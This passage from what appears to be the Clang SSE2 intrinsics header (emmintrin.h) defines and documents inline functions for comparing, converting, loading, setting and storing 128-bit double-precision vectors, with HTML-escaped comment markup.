///    the value in the first parameter is greater than or equal to the
///    corresponding value in the second parameter.
///
///    The comparison returns 0 for false, 1 for true. If either value in a
///    comparison is NaN, returns 0.
///
/// \headerfile &lt;x86intrin.h&gt;
///
/// This intrinsic corresponds to the &lt;c&gt; VCOMISD / COMISD &lt;/c&gt; instruction.
///
/// \param __a
///    A 128-bit vector of [2 x double]. The lower double-precision value is
///    compared to the lower double-precision value of \a __b.
/// \param __b
///    A 128-bit vector of [2 x double]. The lower double-precision value is
///    compared to the lower double-precision value of \a __a.
/// \returns An integer containing the comparison results.
static __inline__ int __DEFAULT_FN_ATTRS _mm_comige_sd(__m128d __a,
                                                       __m128d __b) {
  return __builtin_ia32_comisdge((__v2df)__a, (__v2df)__b);
}

/// Compares the lower double-precision floating-point values in each of
///    the two 128-bit floating-point vectors of [2 x double] to determine if
///    the value in the first parameter is unequal to the corresponding value in
///    the second parameter.
///
///    The comparison returns 0 for false, 1 for true. If either value in a
///    comparison is NaN, returns 1.
///
/// \headerfile &lt;x86intrin.h&gt;
///
/// This intrinsic corresponds to the &lt;c&gt; VCOMISD / COMISD &lt;/c&gt; instruction.
///
/// \param __a
///    A 128-bit vector of [2 x double]. The lower double-precision value is
///    compared to the lower double-precision value of \a __b.
/// \param __b
///    A 128-bit vector of [2 x double]. The lower double-precision value is
///    compared to the lower double-precision value of \a __a.
/// \returns An integer containing the comparison results.
static __inline__ int __DEFAULT_FN_ATTRS _mm_comineq_sd(__m128d __a,
                                                        __m128d __b) {
  return __builtin_ia32_comisdneq((__v2df)__a, (__v2df)__b);
}

/// Compares the lower double-precision floating-point values in each of
///    the two 128-bit floating-point vectors of [2 x double] for equality.
///
///    The comparison returns 0 for false, 1 for true. If either value in a
///    comparison is NaN, returns 0.
///
/// \headerfile &lt;x86intrin.h&gt;
///
/// This intrinsic corresponds to the &lt;c&gt; VUCOMISD / UCOMISD &lt;/c&gt; instruction.
///
/// \param __a
///    A 128-bit vector of [2 x double]. The lower double-precision value is
///    compared to the lower double-precision value of \a __b.
/// \param __b
///    A 128-bit vector of [2 x double]. The lower double-precision value is
///    compared to the lower double-precision value of \a __a.
/// \returns An integer containing the comparison results.
static __inline__ int __DEFAULT_FN_ATTRS _mm_ucomieq_sd(__m128d __a,
                                                        __m128d __b) {
  return __builtin_ia32_ucomisdeq((__v2df)__a, (__v2df)__b);
}

/// Compares the lower double-precision floating-point values in each of
///    the two 128-bit floating-point vectors of [2 x double] to determine if
///    the value in the first parameter is less than the corresponding value in
///    the second parameter.
///
///    The comparison returns 0 for false, 1 for true. If either value in a
///    comparison is NaN, returns 0.
///
/// \headerfile &lt;x86intrin.h&gt;
///
/// This intrinsic corresponds to the &lt;c&gt; VUCOMISD / UCOMISD &lt;/c&gt; instruction.
///
/// \param __a
///    A 128-bit vector of [2 x double]. The lower double-precision value is
///    compared to the lower double-precision value of \a __b.
/// \param __b
///    A 128-bit vector of [2 x double]. The lower double-precision value is
///    compared to the lower double-precision value of \a __a.
/// \returns An integer containing the comparison results.
static __inline__ int __DEFAULT_FN_ATTRS _mm_ucomilt_sd(__m128d __a,
                                                        __m128d __b) {
  return __builtin_ia32_ucomisdlt((__v2df)__a, (__v2df)__b);
}

/// Compares the lower double-precision floating-point values in each of
///    the two 128-bit floating-point vectors of [2 x double] to determine if
///    the value in the first parameter is less than or equal to the
///    corresponding value in the second parameter.
///
///    The comparison returns 0 for false, 1 for true. If either value in a
///    comparison is NaN, returns 0.
///
/// \headerfile &lt;x86intrin.h&gt;
///
/// This intrinsic corresponds to the &lt;c&gt; VUCOMISD / UCOMISD &lt;/c&gt; instruction.
///
/// \param __a
///    A 128-bit vector of [2 x double]. The lower double-precision value is
///    compared to the lower double-precision value of \a __b.
/// \param __b
///     A 128-bit vector of [2 x double]. The lower double-precision value is
///     compared to the lower double-precision value of \a __a.
/// \returns An integer containing the comparison results.
static __inline__ int __DEFAULT_FN_ATTRS _mm_ucomile_sd(__m128d __a,
                                                        __m128d __b) {
  return __builtin_ia32_ucomisdle((__v2df)__a, (__v2df)__b);
}

/// Compares the lower double-precision floating-point values in each of
///    the two 128-bit floating-point vectors of [2 x double] to determine if
///    the value in the first parameter is greater than the corresponding value
///    in the second parameter.
///
///    The comparison returns 0 for false, 1 for true. If either value in a
///    comparison is NaN, returns 0.
///
/// \headerfile &lt;x86intrin.h&gt;
///
/// This intrinsic corresponds to the &lt;c&gt; VUCOMISD / UCOMISD &lt;/c&gt; instruction.
///
/// \param __a
///    A 128-bit vector of [2 x double]. The lower double-precision value is
///    compared to the lower double-precision value of \a __b.
/// \param __b
///     A 128-bit vector of [2 x double]. The lower double-precision value is
///     compared to the lower double-precision value of \a __a.
/// \returns An integer containing the comparison results.
static __inline__ int __DEFAULT_FN_ATTRS _mm_ucomigt_sd(__m128d __a,
                                                        __m128d __b) {
  return __builtin_ia32_ucomisdgt((__v2df)__a, (__v2df)__b);
}

/// Compares the lower double-precision floating-point values in each of
///    the two 128-bit floating-point vectors of [2 x double] to determine if
///    the value in the first parameter is greater than or equal to the
///    corresponding value in the second parameter.
///
///    The comparison returns 0 for false, 1 for true. If either value in a
///    comparison is NaN, returns 0.
///
/// \headerfile &lt;x86intrin.h&gt;
///
/// This intrinsic corresponds to the &lt;c&gt; VUCOMISD / UCOMISD &lt;/c&gt; instruction.
///
/// \param __a
///    A 128-bit vector of [2 x double]. The lower double-precision value is
///    compared to the lower double-precision value of \a __b.
/// \param __b
///    A 128-bit vector of [2 x double]. The lower double-precision value is
///    compared to the lower double-precision value of \a __a.
/// \returns An integer containing the comparison results.
static __inline__ int __DEFAULT_FN_ATTRS _mm_ucomige_sd(__m128d __a,
                                                        __m128d __b) {
  return __builtin_ia32_ucomisdge((__v2df)__a, (__v2df)__b);
}

/// Compares the lower double-precision floating-point values in each of
///    the two 128-bit floating-point vectors of [2 x double] to determine if
///    the value in the first parameter is unequal to the corresponding value in
///    the second parameter.
///
///    The comparison returns 0 for false, 1 for true. If either value in a
///    comparison is NaN, returns 1.
///
/// \headerfile &lt;x86intrin.h&gt;
///
/// This intrinsic corresponds to the &lt;c&gt; VUCOMISD / UCOMISD &lt;/c&gt; instruction.
///
/// \param __a
///    A 128-bit vector of [2 x double]. The lower double-precision value is
///    compared to the lower double-precision value of \a __b.
/// \param __b
///    A 128-bit vector of [2 x double]. The lower double-precision value is
///    compared to the lower double-precision value of \a __a.
/// \returns An integer containing the comparison result.
static __inline__ int __DEFAULT_FN_ATTRS _mm_ucomineq_sd(__m128d __a,
                                                         __m128d __b) {
  return __builtin_ia32_ucomisdneq((__v2df)__a, (__v2df)__b);
}

/// Converts the two double-precision floating-point elements of a
///    128-bit vector of [2 x double] into two single-precision floating-point
///    values, returned in the lower 64 bits of a 128-bit vector of [4 x float].
///    The upper 64 bits of the result vector are set to zero.
///
/// \headerfile &lt;x86intrin.h&gt;
///
/// This intrinsic corresponds to the &lt;c&gt; VCVTPD2PS / CVTPD2PS &lt;/c&gt; instruction.
///
/// \param __a
///    A 128-bit vector of [2 x double].
/// \returns A 128-bit vector of [4 x float] whose lower 64 bits contain the
///    converted values. The upper 64 bits are set to zero.
static __inline__ __m128 __DEFAULT_FN_ATTRS _mm_cvtpd_ps(__m128d __a) {
  return __builtin_ia32_cvtpd2ps((__v2df)__a);
}

/// Converts the lower two single-precision floating-point elements of a
///    128-bit vector of [4 x float] into two double-precision floating-point
///    values, returned in a 128-bit vector of [2 x double]. The upper two
///    elements of the input vector are unused.
///
/// \headerfile &lt;x86intrin.h&gt;
///
/// This intrinsic corresponds to the &lt;c&gt; VCVTPS2PD / CVTPS2PD &lt;/c&gt; instruction.
///
/// \param __a
///    A 128-bit vector of [4 x float]. The lower two single-precision
///    floating-point elements are converted to double-precision values. The
///    upper two elements are unused.
/// \returns A 128-bit vector of [2 x double] containing the converted values.
static __inline__ __m128d __DEFAULT_FN_ATTRS_CONSTEXPR
_mm_cvtps_pd(__m128 __a) {
  return (__m128d) __builtin_convertvector(
      __builtin_shufflevector((__v4sf)__a, (__v4sf)__a, 0, 1), __v2df);
}

/// Converts the lower two integer elements of a 128-bit vector of
///    [4 x i32] into two double-precision floating-point values, returned in a
///    128-bit vector of [2 x double].
///
///    The upper two elements of the input vector are unused.
///
/// \headerfile &lt;x86intrin.h&gt;
///
/// This intrinsic corresponds to the &lt;c&gt; VCVTDQ2PD / CVTDQ2PD &lt;/c&gt; instruction.
///
/// \param __a
///    A 128-bit integer vector of [4 x i32]. The lower two integer elements are
///    converted to double-precision values.
///
///    The upper two elements are unused.
/// \returns A 128-bit vector of [2 x double] containing the converted values.
static __inline__ __m128d __DEFAULT_FN_ATTRS_CONSTEXPR
_mm_cvtepi32_pd(__m128i __a) {
  return (__m128d) __builtin_convertvector(
      __builtin_shufflevector((__v4si)__a, (__v4si)__a, 0, 1), __v2df);
}

/// Converts the two double-precision floating-point elements of a
///    128-bit vector of [2 x double] into two signed 32-bit integer values,
///    returned in the lower 64 bits of a 128-bit vector of [4 x i32]. The upper
///    64 bits of the result vector are set to zero.
///
///    If a converted value does not fit in a 32-bit integer, raises a
///    floating-point invalid exception. If the exception is masked, returns
///    the most negative integer.
///
/// \headerfile &lt;x86intrin.h&gt;
///
/// This intrinsic corresponds to the &lt;c&gt; VCVTPD2DQ / CVTPD2DQ &lt;/c&gt; instruction.
///
/// \param __a
///    A 128-bit vector of [2 x double].
/// \returns A 128-bit vector of [4 x i32] whose lower 64 bits contain the
///    converted values. The upper 64 bits are set to zero.
static __inline__ __m128i __DEFAULT_FN_ATTRS _mm_cvtpd_epi32(__m128d __a) {
  return __builtin_ia32_cvtpd2dq((__v2df)__a);
}

/// Converts the low-order element of a 128-bit vector of [2 x double]
///    into a 32-bit signed integer value.
///
///    If the converted value does not fit in a 32-bit integer, raises a
///    floating-point invalid exception. If the exception is masked, returns
///    the most negative integer.
///
/// \headerfile &lt;x86intrin.h&gt;
///
/// This intrinsic corresponds to the &lt;c&gt; VCVTSD2SI / CVTSD2SI &lt;/c&gt; instruction.
///
/// \param __a
///    A 128-bit vector of [2 x double]. The lower 64 bits are used in the
///    conversion.
/// \returns A 32-bit signed integer containing the converted value.
static __inline__ int __DEFAULT_FN_ATTRS _mm_cvtsd_si32(__m128d __a) {
  return __builtin_ia32_cvtsd2si((__v2df)__a);
}

/// Converts the lower double-precision floating-point element of a
///    128-bit vector of [2 x double], in the second parameter, into a
///    single-precision floating-point value, returned in the lower 32 bits of a
///    128-bit vector of [4 x float]. The upper 96 bits of the result vector are
///    copied from the upper 96 bits of the first parameter.
///
/// \headerfile &lt;x86intrin.h&gt;
///
/// This intrinsic corresponds to the &lt;c&gt; VCVTSD2SS / CVTSD2SS &lt;/c&gt; instruction.
///
/// \param __a
///    A 128-bit vector of [4 x float]. The upper 96 bits of this parameter are
///    copied to the upper 96 bits of the result.
/// \param __b
///    A 128-bit vector of [2 x double]. The lower double-precision
///    floating-point element is used in the conversion.
/// \returns A 128-bit vector of [4 x float]. The lower 32 bits contain the
///    converted value from the second parameter. The upper 96 bits are copied
///    from the upper 96 bits of the first parameter.
static __inline__ __m128 __DEFAULT_FN_ATTRS _mm_cvtsd_ss(__m128 __a,
                                                         __m128d __b) {
  return (__m128)__builtin_ia32_cvtsd2ss((__v4sf)__a, (__v2df)__b);
}

/// Converts a 32-bit signed integer value, in the second parameter, into
///    a double-precision floating-point value, returned in the lower 64 bits of
///    a 128-bit vector of [2 x double]. The upper 64 bits of the result vector
///    are copied from the upper 64 bits of the first parameter.
///
/// \headerfile &lt;x86intrin.h&gt;
///
/// This intrinsic corresponds to the &lt;c&gt; VCVTSI2SD / CVTSI2SD &lt;/c&gt; instruction.
///
/// \param __a
///    A 128-bit vector of [2 x double]. The upper 64 bits of this parameter are
///    copied to the upper 64 bits of the result.
/// \param __b
///    A 32-bit signed integer containing the value to be converted.
/// \returns A 128-bit vector of [2 x double]. The lower 64 bits contain the
///    converted value from the second parameter. The upper 64 bits are copied
///    from the upper 64 bits of the first parameter.
static __inline__ __m128d __DEFAULT_FN_ATTRS_CONSTEXPR
_mm_cvtsi32_sd(__m128d __a, int __b) {
  __a[0] = __b;
  return __a;
}

/// Converts the lower single-precision floating-point element of a
///    128-bit vector of [4 x float], in the second parameter, into a
///    double-precision floating-point value, returned in the lower 64 bits of
///    a 128-bit vector of [2 x double]. The upper 64 bits of the result vector
///    are copied from the upper 64 bits of the first parameter.
///
/// \headerfile &lt;x86intrin.h&gt;
///
/// This intrinsic corresponds to the &lt;c&gt; VCVTSS2SD / CVTSS2SD &lt;/c&gt; instruction.
///
/// \param __a
///    A 128-bit vector of [2 x double]. The upper 64 bits of this parameter are
///    copied to the upper 64 bits of the result.
/// \param __b
///    A 128-bit vector of [4 x float]. The lower single-precision
///    floating-point element is used in the conversion.
/// \returns A 128-bit vector of [2 x double]. The lower 64 bits contain the
///    converted value from the second parameter. The upper 64 bits are copied
///    from the upper 64 bits of the first parameter.
static __inline__ __m128d __DEFAULT_FN_ATTRS_CONSTEXPR
_mm_cvtss_sd(__m128d __a, __m128 __b) {
  __a[0] = __b[0];
  return __a;
}

/// Converts the two double-precision floating-point elements of a
///    128-bit vector of [2 x double] into two signed truncated (rounded
///    toward zero) 32-bit integer values, returned in the lower 64 bits
///    of a 128-bit vector of [4 x i32].
///
///    If a converted value does not fit in a 32-bit integer, raises a
///    floating-point invalid exception. If the exception is masked, returns
///    the most negative integer.
///
/// \headerfile &lt;x86intrin.h&gt;
///
/// This intrinsic corresponds to the &lt;c&gt; VCVTTPD2DQ / CVTTPD2DQ &lt;/c&gt;
///   instruction.
///
/// \param __a
///    A 128-bit vector of [2 x double].
/// \returns A 128-bit vector of [4 x i32] whose lower 64 bits contain the
///    converted values. The upper 64 bits are set to zero.
static __inline__ __m128i __DEFAULT_FN_ATTRS _mm_cvttpd_epi32(__m128d __a) {
  return (__m128i)__builtin_ia32_cvttpd2dq((__v2df)__a);
}

/// Converts the low-order element of a [2 x double] vector into a 32-bit
///    signed truncated (rounded toward zero) integer value.
///
///    If the converted value does not fit in a 32-bit integer, raises a
///    floating-point invalid exception. If the exception is masked, returns
///    the most negative integer.
///
/// \headerfile &lt;x86intrin.h&gt;
///
/// This intrinsic corresponds to the &lt;c&gt; VCVTTSD2SI / CVTTSD2SI &lt;/c&gt;
///   instruction.
///
/// \param __a
///    A 128-bit vector of [2 x double]. The lower 64 bits are used in the
///    conversion.
/// \returns A 32-bit signed integer containing the converted value.
static __inline__ int __DEFAULT_FN_ATTRS _mm_cvttsd_si32(__m128d __a) {
  return __builtin_ia32_cvttsd2si((__v2df)__a);
}

/// Converts the two double-precision floating-point elements of a
///    128-bit vector of [2 x double] into two signed 32-bit integer values,
///    returned in a 64-bit vector of [2 x i32].
///
///    If a converted value does not fit in a 32-bit integer, raises a
///    floating-point invalid exception. If the exception is masked, returns
///    the most negative integer.
///
/// \headerfile &lt;x86intrin.h&gt;
///
/// This intrinsic corresponds to the &lt;c&gt; CVTPD2PI &lt;/c&gt; instruction.
///
/// \param __a
///    A 128-bit vector of [2 x double].
/// \returns A 64-bit vector of [2 x i32] containing the converted values.
static __inline__ __m64 __DEFAULT_FN_ATTRS _mm_cvtpd_pi32(__m128d __a) {
  return __trunc64(__builtin_ia32_cvtpd2dq((__v2df)__a));
}

/// Converts the two double-precision floating-point elements of a
///    128-bit vector of [2 x double] into two signed truncated (rounded toward
///    zero) 32-bit integer values, returned in a 64-bit vector of [2 x i32].
///
///    If a converted value does not fit in a 32-bit integer, raises a
///    floating-point invalid exception. If the exception is masked, returns
///    the most negative integer.
///
/// \headerfile &lt;x86intrin.h&gt;
///
/// This intrinsic corresponds to the &lt;c&gt; CVTTPD2PI &lt;/c&gt; instruction.
///
/// \param __a
///    A 128-bit vector of [2 x double].
/// \returns A 64-bit vector of [2 x i32] containing the converted values.
static __inline__ __m64 __DEFAULT_FN_ATTRS _mm_cvttpd_pi32(__m128d __a) {
  return __trunc64(__builtin_ia32_cvttpd2dq((__v2df)__a));
}

/// Converts the two signed 32-bit integer elements of a 64-bit vector of
///    [2 x i32] into two double-precision floating-point values, returned in a
///    128-bit vector of [2 x double].
///
/// \headerfile &lt;x86intrin.h&gt;
///
/// This intrinsic corresponds to the &lt;c&gt; CVTPI2PD &lt;/c&gt; instruction.
///
/// \param __a
///    A 64-bit vector of [2 x i32].
/// \returns A 128-bit vector of [2 x double] containing the converted values.
static __inline__ __m128d __DEFAULT_FN_ATTRS_CONSTEXPR
_mm_cvtpi32_pd(__m64 __a) {
  return (__m128d) __builtin_convertvector((__v2si)__a, __v2df);
}

/// Returns the low-order element of a 128-bit vector of [2 x double] as
///    a double-precision floating-point value.
///
/// \headerfile &lt;x86intrin.h&gt;
///
/// This intrinsic has no corresponding instruction.
///
/// \param __a
///    A 128-bit vector of [2 x double]. The lower 64 bits are returned.
/// \returns A double-precision floating-point value copied from the lower 64
///    bits of \a __a.
static __inline__ double __DEFAULT_FN_ATTRS_CONSTEXPR
_mm_cvtsd_f64(__m128d __a) {
  return __a[0];
}

/// Loads a 128-bit floating-point vector of [2 x double] from an aligned
///    memory location.
///
/// \headerfile &lt;x86intrin.h&gt;
///
/// This intrinsic corresponds to the &lt;c&gt; VMOVAPD / MOVAPD &lt;/c&gt; instruction.
///
/// \param __dp
///    A pointer to a 128-bit memory location. The address of the memory
///    location has to be 16-byte aligned.
/// \returns A 128-bit vector of [2 x double] containing the loaded values.
static __inline__ __m128d __DEFAULT_FN_ATTRS _mm_load_pd(double const *__dp) {
  return *(const __m128d *)__dp;
}

/// Loads a double-precision floating-point value from a specified memory
///    location and duplicates it to both vector elements of a 128-bit vector of
///    [2 x double].
///
/// \headerfile &lt;x86intrin.h&gt;
///
/// This intrinsic corresponds to the &lt;c&gt; VMOVDDUP / MOVDDUP &lt;/c&gt; instruction.
///
/// \param __dp
///    A pointer to a memory location containing a double-precision value.
/// \returns A 128-bit vector of [2 x double] containing the loaded and
///    duplicated values.
static __inline__ __m128d __DEFAULT_FN_ATTRS _mm_load1_pd(double const *__dp) {
  struct __mm_load1_pd_struct {
    double __u;
  } __attribute__((__packed__, __may_alias__));
  double __u = ((const struct __mm_load1_pd_struct *)__dp)-&gt;__u;
  return __extension__(__m128d){__u, __u};
}

#define _mm_load_pd1(dp) _mm_load1_pd(dp)

/// Loads two double-precision values, in reverse order, from an aligned
///    memory location into a 128-bit vector of [2 x double].
///
/// \headerfile &lt;x86intrin.h&gt;
///
/// This intrinsic corresponds to the &lt;c&gt; VMOVAPD / MOVAPD &lt;/c&gt; instruction +
/// needed shuffling instructions. In AVX mode, the shuffling may be combined
/// with the \c VMOVAPD, resulting in only a \c VPERMILPD instruction.
///
/// \param __dp
///    A 16-byte aligned pointer to an array of double-precision values to be
///    loaded in reverse order.
/// \returns A 128-bit vector of [2 x double] containing the reversed loaded
///    values.
static __inline__ __m128d __DEFAULT_FN_ATTRS _mm_loadr_pd(double const *__dp) {
  __m128d __u = *(const __m128d *)__dp;
  return __builtin_shufflevector((__v2df)__u, (__v2df)__u, 1, 0);
}

/// Loads a 128-bit floating-point vector of [2 x double] from an
///    unaligned memory location.
///
/// \headerfile &lt;x86intrin.h&gt;
///
/// This intrinsic corresponds to the &lt;c&gt; VMOVUPD / MOVUPD &lt;/c&gt; instruction.
///
/// \param __dp
///    A pointer to a 128-bit memory location. The address of the memory
///    location does not have to be aligned.
/// \returns A 128-bit vector of [2 x double] containing the loaded values.
static __inline__ __m128d __DEFAULT_FN_ATTRS _mm_loadu_pd(double const *__dp) {
  struct __loadu_pd {
    __m128d_u __v;
  } __attribute__((__packed__, __may_alias__));
  return ((const struct __loadu_pd *)__dp)-&gt;__v;
}

/// Loads a 64-bit integer value to the low element of a 128-bit integer
///    vector and clears the upper element.
///
/// \headerfile &lt;x86intrin.h&gt;
///
/// This intrinsic corresponds to the &lt;c&gt; VMOVQ / MOVQ &lt;/c&gt; instruction.
///
/// \param __a
///    A pointer to a 64-bit memory location. The address of the memory
///    location does not have to be aligned.
/// \returns A 128-bit vector of [2 x i64] containing the loaded value.
static __inline__ __m128i __DEFAULT_FN_ATTRS _mm_loadu_si64(void const *__a) {
  struct __loadu_si64 {
    long long __v;
  } __attribute__((__packed__, __may_alias__));
  long long __u = ((const struct __loadu_si64 *)__a)-&gt;__v;
  return __extension__(__m128i)(__v2di){__u, 0LL};
}

/// Loads a 32-bit integer value to the low element of a 128-bit integer
///    vector and clears the upper element.
///
/// \headerfile &lt;x86intrin.h&gt;
///
/// This intrinsic corresponds to the &lt;c&gt; VMOVD / MOVD &lt;/c&gt; instruction.
///
/// \param __a
///    A pointer to a 32-bit memory location. The address of the memory
///    location does not have to be aligned.
/// \returns A 128-bit vector of [4 x i32] containing the loaded value.
static __inline__ __m128i __DEFAULT_FN_ATTRS _mm_loadu_si32(void const *__a) {
  struct __loadu_si32 {
    int __v;
  } __attribute__((__packed__, __may_alias__));
  int __u = ((const struct __loadu_si32 *)__a)-&gt;__v;
  return __extension__(__m128i)(__v4si){__u, 0, 0, 0};
}

/// Loads a 16-bit integer value to the low element of a 128-bit integer
///    vector and clears the upper element.
///
/// \headerfile &lt;x86intrin.h&gt;
///
/// This intrinsic does not correspond to a specific instruction.
///
/// \param __a
///    A pointer to a 16-bit memory location. The address of the memory
///    location does not have to be aligned.
/// \returns A 128-bit vector of [8 x i16] containing the loaded value.
static __inline__ __m128i __DEFAULT_FN_ATTRS _mm_loadu_si16(void const *__a) {
  struct __loadu_si16 {
    short __v;
  } __attribute__((__packed__, __may_alias__));
  short __u = ((const struct __loadu_si16 *)__a)-&gt;__v;
  return __extension__(__m128i)(__v8hi){__u, 0, 0, 0, 0, 0, 0, 0};
}

/// Loads a 64-bit double-precision value to the low element of a
///    128-bit integer vector and clears the upper element.
///
/// \headerfile &lt;x86intrin.h&gt;
///
/// This intrinsic corresponds to the &lt;c&gt; VMOVSD / MOVSD &lt;/c&gt; instruction.
///
/// \param __dp
///    A pointer to a memory location containing a double-precision value.
///    The address of the memory location does not have to be aligned.
/// \returns A 128-bit vector of [2 x double] containing the loaded value.
static __inline__ __m128d __DEFAULT_FN_ATTRS _mm_load_sd(double const *__dp) {
  struct __mm_load_sd_struct {
    double __u;
  } __attribute__((__packed__, __may_alias__));
  double __u = ((const struct __mm_load_sd_struct *)__dp)-&gt;__u;
  return __extension__(__m128d){__u, 0};
}

/// Loads a double-precision value into the high-order bits of a 128-bit
///    vector of [2 x double]. The low-order bits are copied from the low-order
///    bits of the first operand.
///
/// \headerfile &lt;x86intrin.h&gt;
///
/// This intrinsic corresponds to the &lt;c&gt; VMOVHPD / MOVHPD &lt;/c&gt; instruction.
///
/// \param __a
///    A 128-bit vector of [2 x double]. \n
///    Bits [63:0] are written to bits [63:0] of the result.
/// \param __dp
///    A pointer to a 64-bit memory location containing a double-precision
///    floating-point value that is loaded. The loaded value is written to bits
///    [127:64] of the result. The address of the memory location does not have
///    to be aligned.
/// \returns A 128-bit vector of [2 x double] containing the moved values.
static __inline__ __m128d __DEFAULT_FN_ATTRS _mm_loadh_pd(__m128d __a,
                                                          double const *__dp) {
  struct __mm_loadh_pd_struct {
    double __u;
  } __attribute__((__packed__, __may_alias__));
  double __u = ((const struct __mm_loadh_pd_struct *)__dp)-&gt;__u;
  return __extension__(__m128d){__a[0], __u};
}

/// Loads a double-precision value into the low-order bits of a 128-bit
///    vector of [2 x double]. The high-order bits are copied from the
///    high-order bits of the first operand.
///
/// \headerfile &lt;x86intrin.h&gt;
///
/// This intrinsic corresponds to the &lt;c&gt; VMOVLPD / MOVLPD &lt;/c&gt; instruction.
///
/// \param __a
///    A 128-bit vector of [2 x double]. \n
///    Bits [127:64] are written to bits [127:64] of the result.
/// \param __dp
///    A pointer to a 64-bit memory location containing a double-precision
///    floating-point value that is loaded. The loaded value is written to bits
///    [63:0] of the result. The address of the memory location does not have to
///    be aligned.
/// \returns A 128-bit vector of [2 x double] containing the moved values.
static __inline__ __m128d __DEFAULT_FN_ATTRS _mm_loadl_pd(__m128d __a,
                                                          double const *__dp) {
  struct __mm_loadl_pd_struct {
    double __u;
  } __attribute__((__packed__, __may_alias__));
  double __u = ((const struct __mm_loadl_pd_struct *)__dp)-&gt;__u;
  return __extension__(__m128d){__u, __a[1]};
}

/// Constructs a 128-bit floating-point vector of [2 x double] with
///    unspecified content. This could be used as an argument to another
///    intrinsic function where the argument is required but the value is not
///    actually used.
///
/// \headerfile &lt;x86intrin.h&gt;
///
/// This intrinsic has no corresponding instruction.
///
/// \returns A 128-bit floating-point vector of [2 x double] with unspecified
///    content.
static __inline__ __m128d __DEFAULT_FN_ATTRS _mm_undefined_pd(void) {
  return (__m128d)__builtin_ia32_undef128();
}

/// Constructs a 128-bit floating-point vector of [2 x double]. The lower
///    64 bits of the vector are initialized with the specified double-precision
///    floating-point value. The upper 64 bits are set to zero.
///
/// \headerfile &lt;x86intrin.h&gt;
///
/// This intrinsic corresponds to the &lt;c&gt; VMOVQ / MOVQ &lt;/c&gt; instruction.
///
/// \param __w
///    A double-precision floating-point value used to initialize the lower 64
///    bits of the result.
/// \returns An initialized 128-bit floating-point vector of [2 x double]. The
///    lower 64 bits contain the value of the parameter. The upper 64 bits are
///    set to zero.
static __inline__ __m128d __DEFAULT_FN_ATTRS_CONSTEXPR _mm_set_sd(double __w) {
  return __extension__(__m128d){__w, 0.0};
}

/// Constructs a 128-bit floating-point vector of [2 x double], with each
///    of the two double-precision floating-point vector elements set to the
///    specified double-precision floating-point value.
///
/// \headerfile &lt;x86intrin.h&gt;
///
/// This intrinsic corresponds to the &lt;c&gt; VMOVDDUP / MOVLHPS &lt;/c&gt; instruction.
///
/// \param __w
///    A double-precision floating-point value used to initialize each vector
///    element of the result.
/// \returns An initialized 128-bit floating-point vector of [2 x double].
static __inline__ __m128d __DEFAULT_FN_ATTRS_CONSTEXPR _mm_set1_pd(double __w) {
  return __extension__(__m128d){__w, __w};
}

/// Constructs a 128-bit floating-point vector of [2 x double], with each
///    of the two double-precision floating-point vector elements set to the
///    specified double-precision floating-point value.
///
/// \headerfile &lt;x86intrin.h&gt;
///
/// This intrinsic corresponds to the &lt;c&gt; VMOVDDUP / MOVLHPS &lt;/c&gt; instruction.
///
/// \param __w
///    A double-precision floating-point value used to initialize each vector
///    element of the result.
/// \returns An initialized 128-bit floating-point vector of [2 x double].
static __inline__ __m128d __DEFAULT_FN_ATTRS_CONSTEXPR _mm_set_pd1(double __w) {
  return _mm_set1_pd(__w);
}

/// Constructs a 128-bit floating-point vector of [2 x double]
///    initialized with the specified double-precision floating-point values.
///
/// \headerfile &lt;x86intrin.h&gt;
///
/// This intrinsic corresponds to the &lt;c&gt; VUNPCKLPD / UNPCKLPD &lt;/c&gt; instruction.
///
/// \param __w
///    A double-precision floating-point value used to initialize the upper 64
///    bits of the result.
/// \param __x
///    A double-precision floating-point value used to initialize the lower 64
///    bits of the result.
/// \returns An initialized 128-bit floating-point vector of [2 x double].
static __inline__ __m128d __DEFAULT_FN_ATTRS_CONSTEXPR _mm_set_pd(double __w,
                                                                  double __x) {
  return __extension__(__m128d){__x, __w};
}

/// Constructs a 128-bit floating-point vector of [2 x double],
///    initialized in reverse order with the specified double-precision
///    floating-point values.
///
/// \headerfile &lt;x86intrin.h&gt;
///
/// This intrinsic corresponds to the &lt;c&gt; VUNPCKLPD / UNPCKLPD &lt;/c&gt; instruction.
///
/// \param __w
///    A double-precision floating-point value used to initialize the lower 64
///    bits of the result.
/// \param __x
///    A double-precision floating-point value used to initialize the upper 64
///    bits of the result.
/// \returns An initialized 128-bit floating-point vector of [2 x double].
static __inline__ __m128d __DEFAULT_FN_ATTRS_CONSTEXPR _mm_setr_pd(double __w,
                                                                   double __x) {
  return __extension__(__m128d){__w, __x};
}

/// Constructs a 128-bit floating-point vector of [2 x double]
///    initialized to zero.
///
/// \headerfile &lt;x86intrin.h&gt;
///
/// This intrinsic corresponds to the &lt;c&gt; VXORPS / XORPS &lt;/c&gt; instruction.
///
/// \returns An initialized 128-bit floating-point vector of [2 x double] with
///    all elements set to zero.
static __inline__ __m128d __DEFAULT_FN_ATTRS_CONSTEXPR _mm_setzero_pd(void) {
  return __extension__(__m128d){0.0, 0.0};
}

/// Constructs a 128-bit floating-point vector of [2 x double]. The lower
///    64 bits are set to the lower 64 bits of the second parameter. The upper
///    64 bits are set to the upper 64 bits of the first parameter.
///
/// \headerfile &lt;x86intrin.h&gt;
///
/// This intrinsic corresponds to the &lt;c&gt; VBLENDPD / BLENDPD &lt;/c&gt; instruction.
///
/// \param __a
///    A 128-bit vector of [2 x double]. The upper 64 bits are written to the
///    upper 64 bits of the result.
/// \param __b
///    A 128-bit vector of [2 x double]. The lower 64 bits are written to the
///    lower 64 bits of the result.
/// \returns A 128-bit vector of [2 x double] containing the moved values.
static __inline__ __m128d __DEFAULT_FN_ATTRS_CONSTEXPR
_mm_move_sd(__m128d __a, __m128d __b) {
  __a[0] = __b[0];
  return __a;
}

/// Stores the lower 64 bits of a 128-bit vector of [2 x double] to a
///    memory location.
///
/// \headerfile &lt;x86intrin.h&gt;
///
/// This intrinsic corresponds to the &lt;c&gt; VMOVSD / MOVSD &lt;/c&gt; instruction.
///
/// \param __dp
///    A pointer to a 64-bit memory location.
/// \param __a
///    A 128-bit vector of [2 x double] containing the value to be stored.
static __inline__ void __DEFAULT_FN_ATTRS _mm_store_sd(double *__dp,
                                                       __m128d __a) {
  struct __mm_store_sd_struct {
    double __u;
  } __attribute__((__packed__, __may_alias__));
  ((struct __mm_store_sd_struct *)__dp)-&gt;__u = __a[0];
}

/// Moves packed double-precision values from a 128-bit vector of
///    [2 x double] to a memory location.
///
/// \headerfile &lt;x86intrin.h&gt;
///
